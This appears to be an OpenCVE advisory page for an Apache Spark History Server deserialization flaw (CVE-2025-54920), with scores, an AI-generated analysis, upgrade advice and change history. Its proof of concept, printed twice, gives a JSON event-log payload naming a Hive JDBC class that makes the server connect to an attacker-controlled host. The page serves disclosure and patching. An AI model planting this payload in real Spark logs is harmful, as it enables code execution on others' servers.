Description
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.





Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.





Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.


The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.






Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:


{

"Event": "org.apache.hive.jdbc.HiveConnection",
"uri": "jdbc:hive2://<IP>:<PORT>/",
"info": {
"hive.metastore.uris": "thrift://<IP>:<PORT>"
}
}







3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.










Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
Published: 2026-03-14
Score: 8.8 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Code Execution
Action: Immediate Patch
AI Analysis

Impact

The fault lies in the Spark History Server’s handling of event log JSON prior to Spark 3.5.7 and 4.0.1, where Jackson’s polymorphic deserialization accepts a class name supplied in the JSON. An attacker who can write to the event log directory can craft a payload that lists an arbitrary class, such as org.apache.hive.jdbc.HiveConnection, and trigger the History Server to instantiate it during deserialization. This permits arbitrary code execution on the host running the History Server, giving the attacker full control of the system.

Affected Systems

Apache Software Foundation’s Apache Spark is affected for all releases older than 3.5.7 and 4.0.1, including 3.5.4 and the 4.0.0 release candidates documented by the CPE list. Users running those versions should verify that the event log location is not writable by untrusted parties.

Risk and Exploitability

The vulnerability carries a CVSS score of 8.8, indicating high severity, while the EPSS score is below 1%, marking a low likelihood of widespread exploitation. It is not listed in the CISA KEV catalog, so no confirmed exploits are publicly known. However, exploitation requires write access to the event log directory, which is a local privilege condition. Once the malicious JSON is processed, the attacker achieves full code execution on the host running the History Server, posing a significant system‐wide threat.

Generated by OpenCVE AI on March 20, 2026 at 20:52 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Apache Spark to version 3.5.7 or later, or to 4.0.1 or newer, which removes the deserialization flaw.

Generated by OpenCVE AI on March 20, 2026 at 20:52 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-jwp6-cvj8-fw65 Apache Spark: Spark History Server Code Execution Vulnerability
History

Fri, 20 Mar 2026 19:30:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:-:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc1:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc2:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc3:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc4:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc5:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc6:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.0:rc7:*:*:*:*:*:*
cpe:2.3:a:apache:spark:4.0.1:rc1:*:*:*:*:*:*

Tue, 17 Mar 2026 13:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

cvssV3_1

{'score': 8.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}


Tue, 17 Mar 2026 00:15:00 +0000

Type Values Removed Values Added
Weaknesses CWE-94
References
Metrics threat_severity

None

cvssV3_1

{'score': 6.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}

threat_severity

Moderate


Mon, 16 Mar 2026 14:30:00 +0000

Type Values Removed Values Added
References

Mon, 16 Mar 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Apache
Apache spark
Vendors & Products Apache
Apache spark

Sat, 14 Mar 2026 09:15:00 +0000

Type Values Removed Values Added
Description This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.
Title Apache Spark: Spark History Server Code Execution Vulnerability
Weaknesses CWE-502
References

cve-icon MITRE

Status: PUBLISHED

Assigner: apache

Published:

Updated: 2026-03-17T12:45:29.903Z

Reserved: 2025-08-01T01:09:45.224Z

Link: CVE-2025-54920

cve-icon Vulnrichment

Updated: 2026-03-14T09:12:25.119Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-16T14:17:59.877

Modified: 2026-03-20T19:16:45.837

Link: CVE-2025-54920

cve-icon Redhat

Severity : Moderate

Publid Date: 2026-03-14T09:01:50Z

Links: CVE-2025-54920 - Bugzilla

cve-icon OpenCVE Enrichment

Updated: 2026-03-23T13:39:08Z

Weaknesses